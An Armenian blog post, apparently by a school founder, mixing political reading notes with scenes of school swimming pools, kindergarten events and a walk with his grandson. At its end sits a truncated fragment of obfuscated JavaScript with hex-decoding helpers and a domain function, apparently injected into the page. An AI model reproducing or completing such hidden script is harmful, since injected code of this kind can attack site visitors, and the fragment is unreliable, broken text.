Քաղաքական օրագիր
Տեսե՛ք, մեկ-երկու օրով ուշացրի իմ քաղաքական օրագրի համար ընտրած ընթերցանության նյութերի հրապարակումը՝ հրամցումը քեզ, մեծարգո ընթերցող օրագրի, և… ուշացա՞. պատմական նշանակությո՞ւն ունեն դրանք…
Իսրայելը և Թուրքիան հասել են հարաբերությունների կարգավորման համաձայնության. սա՝ հունիսի 26-ին: Իսկ այսօր արդեն հայտնի է նրանց «հույժ գաղտնի» համաձայնագրի ստորագրման օրը, վայրը… Նույնը՝ Թուրքիա-Ռուսաստան հարաբերությունների կարգավորման մասին… Բա տեսեք՝ ի՜նչ արագությամբ են զարգանում վրաց-ամերիկյան, Վրաստան-ՆԱՏՕ, Վրաստան-Ռուսաստան հարաբերությունները…
Ի՜նչ արագ են марш-бросок-ով (հայերեն եք ուզում՝ սրարշավ, թափով) ետպատերազմյան վաթսուն տարում Եվրոպան կառուցած եվրոպացիները սկսում ատել իրենց ստեղծած նոր աշխարհակարգի, թվում է, առաջիկա հարյուր տարվա առանցքներից մեկը՝ Եվրոպական միությունը… Յոթ պատճառ՝ Եվրամիությունն ատելու համար… Սա էլ հո չի՞ հնացել, այժմեակա՞ն է, ընթերցող… Ահա, նավթի գների անկման պատճառով տնտեսությունը ցնցած Ադրբեջանը նույն արագությամբ փորձում է գտնել դրամական այլ ուղիներ, և… գտնո՞ւմ է: Փողն էլ ոչ թե միլիոններով են հաշվում, այլ միլիարդներով, այն էլ դոլարներով… Բաքուն հայտարարել է, որ Հարավային գազային ուղին թույլ կտա աշխատել երեսունից-հիսուն միլիարդ դոլար:
Իսկ «միանձնուհիների դեմքից վաղուց անհետացած ուրախությունը տխրեցնում է»,- մեր Ֆրանցիսկոս պապին կարդացի Նունե Մովսիսյանի բլոգում… Այսպիսի աշխարհ, ու կենտրոնում մեր կրթահամալիրյան Բանգլադեշը…
5-6 տարեկանների «Հունիսիկ» ստուգատեսը Հիմնական դպրոցում:
Լուսանկարները՝ Անահիտ Հարությունյանի:
Աբրահամ Հովհաննիսյանի՝ մեր հին ընկերոջ ու սեբաստացու, Սեբաստացի ագարակի մեր այսօրվա հարևանի հետ շրջում էինք ագարակով-Դպրոց-պարտեզով, ներկայացնում էի նրան այսօրվա-վաղվա զարգացումները, գործեր, որ երեկ պիտի արված լինեին, ու հանկարծ… հմայիլ… Ուսուցչուհիների մի մեծ սքանչելի խումբ տեսա կրթահամալիրի ծածկած լողավազանում… Տեսարա՜ն… Ժամը 9-ին՝ առավոտյան… Բացվեց… Նոր դպրոցում երեկ ես փառավորվեցի գրավիչ, հիգիենիկ, գունեղ լողափով… Այսպես ամեն օ՞ր. խնամք ու զարգացում պահանջող մեր մանկավարժության ամենասեբաստացիական-մարդկային տարածքներն են սրանք, բոլոր տարիքի սեբաստացի սիրելիներ, ու դիմացը դեռ հուլիս-օգոստոս-սեպտեմբերի արևը կա բանգլադեշյան… Ինչո՞ւ սառը ջուրը, արևային լոգանքը, զվարթությունը, ծովափային կյանքը մեր չդարձնենք ամենօրյա, բոլորիս համար, սկսած երկու տարեկանից… Միջոցառում չէ, որ լավ-վատ արեցիր, հավաքեցիր, ջնջվեց-գնաց, ի՞նչ մնաց… Կյանքն է մեր… Ա՛յ, ես տիար Գևորգին երեկ վերջապես տարա Գեղարվեստի մեր լողավազան: Լողացինք ընկերներով, ու ես իմ հեծանվով՝ Անգլիական այգի: Օր առաջ ուզում եմ ավարտենք ագարակ-ձիանոցը՝ իր մանեժով, որ վճռական կպնեմ բաց-մեծ լողավազան-ափի կառուցմանը՝ Մայր դպրոցի դաշտերից մեկում… Ես վստահ եմ, որ լողափային կյանքը մեղմություն-ջերմություն կհաղորդի մեր առօրյային, մեզ յուրաքանչյուրիս, ու առողջություն… Լողանք ամառն ամեն օր սառը ջրում ու մոռանաք բոլոր ցավերը՝ հոգեկան-ֆիզիկական…
Նոր դպրոցի 2-5 տարեկանները:
Լուսանկարները՝ Աննա Հայրոյանի, Ամալյա Բաբիչի:
Դավիթ Բլեյանը պարտեզ է գնում մեծացող ձգտումով.
— Այսօր ո՞ր օրն է, պա՛պ:
— Երեքշաբթի, Դավիթ: Լա՜վ օր է երեքշաբթին,- չգիտես ինչու կպցրի իմ կարճ պատասխանին…
Մառա՞զմ է մեծերիս դիդակտիկան՝ երկա՜ր-տաղտուկ, անտեղի՝ հաճախ…
— Բոլոր օրերն էլ լավն են, պա՛պ…
— Դավիթ, օգնի՛ր մայրիկին… պատշգամբ տար…
— Ի՜նչ շատ եք ինձ գործի դնում: Ե՞րբ ենք տանից դուրս գալու՝ ընկերներիս մոտ գնամ,- խոսքս բերանումս է թողնում Բլեյան ժառանգը… Ես, իհարկե, այսպիսի տեսարաններ սիրում եմ: Ճանապարհին, Բանգլադեշ մտնելիս, Բաբաջանյան պողոտայի մեկնարկը հայր ու որդի հավանում ենք… ամեն անգամ մի միտք ծնվում է իմ գլխում, Դավթի մոտ…
— Պապ, լավ կլինի, չէ՞, իմ ընկերներին պաղպաղակ տանենք:
— Կիլոյով տանե՞նք…
— Չէ՜, հատով… հատով հեշտ կուտեն՝ փոքր Ալեքսն էլ, մեծն էլ:
— Հա, բայց քանի՞ հատ տանենք… Դավի՛թ:
— Պա՛պ, էնպես չլինի, որ մեկն ուտի, մյուսը նայի…
Արմինե վարորդը խառնվում է իրար… Տնային տնտեսությունը ճաքեր չտա՞… Մենք որոշում ենք չնյարդայնացնել մայրիկին, որ նաև վարորդ է, իջնում ենք վերգետնյայի մոտ…
— Մի հատ էլ ինձ համար առե՜ք… ձեր թվերի մեջ մեկն ավելի, պակաս…
Մինչև վերջ չենք հասցնում լսել: Դավիթը հաշվում է խմբի ընկերներին: Կա, որ ազգանունը գիտի՝ Կարմիրշալյան Ալեքս, Կարապետյան Դավիթ… Աղջիկներին՝ միայն անունով, իսկ վերջերս եկած պուճուրիկներին չի հաշվում…
— Կկարողանա՞ն ուտեն՝ կթափեն իրենց վրա, ո՞վ է մաքրելու… Մեղքը չե՞ն ընկեր Շողիկը, Ռուզանը…
Մենք քսանհինգ երկու-երեք տեսակ պաղպաղակով այգով մտնում ենք պարտեզ… Դրսում ո՜նց են դիմավորում… Սպասում են Դավթին: Իսկ Նարեն (թե՞ Վարդուհին), իմ ձեռքից վերցնելով պաղպաղակի տոպրակը, ինձ ներքևից վերև չափելով.
— Դու ինձ ու Վարդուհուն (թե՞ Նարեին) մի՜շտ խառնում ես…
Լուսանկարները՝ Արմինե Աբրահամյանի:
Ֆոտոխմբագիր՝ Անահիտ Հարությունյան
# 716
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e